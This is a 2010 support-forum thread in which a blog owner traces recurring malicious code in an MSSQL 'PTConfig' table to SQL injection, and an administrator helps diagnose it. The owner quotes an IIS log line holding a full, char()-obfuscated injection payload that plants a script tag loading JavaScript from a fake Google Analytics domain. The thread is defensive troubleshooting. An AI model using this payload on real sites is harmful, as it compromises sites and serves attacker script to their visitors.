Table PTConfig being injected with malicious code
encikacop

Posts : 2
Location : N/A
Posted : 1/14/2010 10:52:35 PM  

Hi guys,

I'm new here. I found out our blog is having errors when accessing it. Deeper investigation led to finding malicious code inside the table PTConfig in an MSSQL 2005 database. Refer to the picture:

Any idea how it happened or how to prevent it?

FYI, the database server is on another server which is very secure and cannot be accessed from outside. Only the web server has a connection to the database server. This means there is no way an 'injector' can directly access the MSSQL server. They must be injecting from the blog.

Any advice and reply is highly appreciated.

Presstopia

Administrator

Posts : 431
Location : Toronto, Canada
Posted : 1/14/2010 11:32:03 PM  
If you have access to your IIS logs, do a search for "PTConfig". If it was SQL injection there might be a reference in there somewhere which would give an idea which page was used to inject the code.

Having said that, and putting on my CSI hat for a sec ... the added code is pretty harmless (even though it will cause errors because numerics are now alphanumeric, etc.) which leads me to believe that it may have been added through another mechanism. If someone was injecting code they'd probably be injecting something more useful than the Google Analytics JS file load code. Any chance that someone within your organization may have run an update through Management Studio and accidentally messed up the PTConfig table?
encikacop

Posts : 2
Location : N/A
Posted : 1/16/2010 9:52:17 PM  

I don't think so, because the database server is not directly connected to the outside. No one can access it except the web server. The injected code is not Google Analytics code, because the domain is a fake domain (which is similar to the Google Analytics URL). Please double-check the domain name. The code injection happens every day and we need to remove the lines manually one by one.

When I searched the IIS log files, I found a suspicious URL, which is:

GET /pt/blog/default.aspx tag=E1'+update+PTconfig+set+cfg_Value=cast(cfg_Value+as+varchar(8000))%2Bcast(char(060)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(116)%2Bchar(121)%2Bchar(112)%2Bchar(101)%2Bchar(61)%2Bchar(39)%2Bchar(116)%2Bchar(101)%2Bchar(120)%2Bchar(116)%2Bchar(47)%2Bchar(106)%2Bchar(97)%2Bchar(118)%2Bchar(97)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(39)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(39)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(97)%2Bchar(110)%2Bchar(97)%2Bchar(108)%2Bchar(121)%2Bchar(116)%2Bchar(105)%2Bchar(105)%2Bchar(99)%2Bchar(115)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(99)%2Bchar(104)%2Bchar(105)%2Bchar(110)%2Bchar(46)%2Bchar(106)%2Bchar(115)%2Bchar(39)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)+as+varchar(8000))--


It seems like the blog can easily be injected with code like that shown above. So what should we do? Is this our problem or Presstopia's problem?

Presstopia

Administrator

Posts : 431
Location : Toronto, Canada
Posted : 1/16/2010 10:38:16 PM  
That log file entry is definitely suspicious. The good news is that we at least know how the code is injected.

What's interesting is that the injection happens via a querystring variable called "tag", as in "tag=E1" etc. Presstopia Blog doesn't actually support that querystring variable. Has your copy of Presstopia Blog been modified at all?
